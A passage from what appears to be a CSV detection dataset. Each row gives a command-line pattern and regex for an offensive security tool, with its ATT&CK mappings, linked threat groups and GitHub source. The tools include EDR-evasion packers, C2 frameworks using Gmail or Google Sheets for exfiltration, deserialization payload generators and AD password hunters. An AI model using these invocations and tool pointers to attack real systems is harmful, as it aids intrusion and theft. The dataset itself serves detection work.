T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=service-dll *.exe*",".{0,1000}\s\-format\=service\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=service-exe *.exe*",".{0,1000}\s\-format\=service\-exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* fox-info.nse*",".{0,1000}\sfox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* freelancer-info.nse*",".{0,1000}\sfreelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Freeze.rs/*",".{0,1000}\sFreeze\.rs\/.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "* FROM LDAPHUNTERFINDINGS*",".{0,1000}\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* fscan.exe*",".{0,1000}\sfscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscan32.exe*",".{0,1000}\sfscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscan64.exe*",".{0,1000}\sfscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarm64.exe*",".{0,1000}\sfscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarmv6.exe*",".{0,1000}\sfscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarmv7.exe*",".{0,1000}\sfscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* ftp-anon.nse*",".{0,1000}\sftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-bounce.nse*",".{0,1000}\sftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-brute.nse*",".{0,1000}\sftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-libopie.nse*",".{0,1000}\sftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-log4shell.nse*",".{0,1000}\sftp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* ftp-proftpd-backdoor.nse*",".{0,1000}\sftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FtpSniffer *",".{0,1000}\sFtpSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* ftp-syst.nse*",".{0,1000}\sftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vsftpd-backdoor.nse*",".{0,1000}\sftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vuln-cve2010-4221.nse*",".{0,1000}\sftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FudgeC2 *",".{0,1000}\sFudgeC2\s.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "* -FullPrivs * ",".{0,1000}\s\-FullPrivs\s.{0,1000}\s","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*",".{0,1000}\s\-\-functions\sNtProtectVirtualMemory.{0,1000}NtWriteVirtualMemory\s\-o\ssyscalls_mem.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* fuzz -u * -p *--target*",".{0,1000}\sfuzz\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine 
through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* FUZZ:FUZZ *",".{0,1000}\sFUZZ\:FUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* --fuzzers addition*",".{0,1000}\s\-\-fuzzers\saddition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers bitsquatting*",".{0,1000}\s\-\-fuzzers\sbitsquatting.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers cyrillic*",".{0,1000}\s\-\-fuzzers\scyrillic.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. 
phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers dictionary*",".{0,1000}\s\-\-fuzzers\sdictionary.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers homoglyph*",".{0,1000}\s\-\-fuzzers\shomoglyph.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers hyphenation*",".{0,1000}\s\-\-fuzzers\shyphenation.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers insertion*",".{0,1000}\s\-\-fuzzers\sinsertion.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers omission*",".{0,1000}\s\-\-fuzzers\somission.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers repetition*",".{0,1000}\s\-\-fuzzers\srepetition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers replacement*",".{0,1000}\s\-\-fuzzers\sreplacement.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers subdomain*",".{0,1000}\s\-\-fuzzers\ssubdomain.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers transposition*",".{0,1000}\s\-\-fuzzers\stransposition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers vowel-swap*",".{0,1000}\s\-\-fuzzers\svowel\-swap.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* FWUprank.ps1",".{0,1000}\sFWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -g ActivitySurrogateSelector*",".{0,1000}\s\-g\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g ClaimsPrincipal 
*",".{0,1000}\s\-g\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g -n --kerberoast*",".{0,1000}\s\-g\s\-n\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -g PSObject *",".{0,1000}\s\-g\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g TextFormattingRunProperties *",".{0,1000}\s\-g\sTextFormattingRunProperties\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget ActivitySurrogateSelector*",".{0,1000}\s\-\-gadget\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget ClaimsPrincipal *",".{0,1000}\s\-\-gadget\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget PSObject *",".{0,1000}\s\-\-gadget\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* ganglia-info.nse*",".{0,1000}\sganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GC2-sheet*",".{0,1000}\sGC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "* gcat.py -*",".{0,1000}\sgcat\.py\s\-.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "* gen -f client -O windows -A x64*",".{0,1000}\sgen\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. 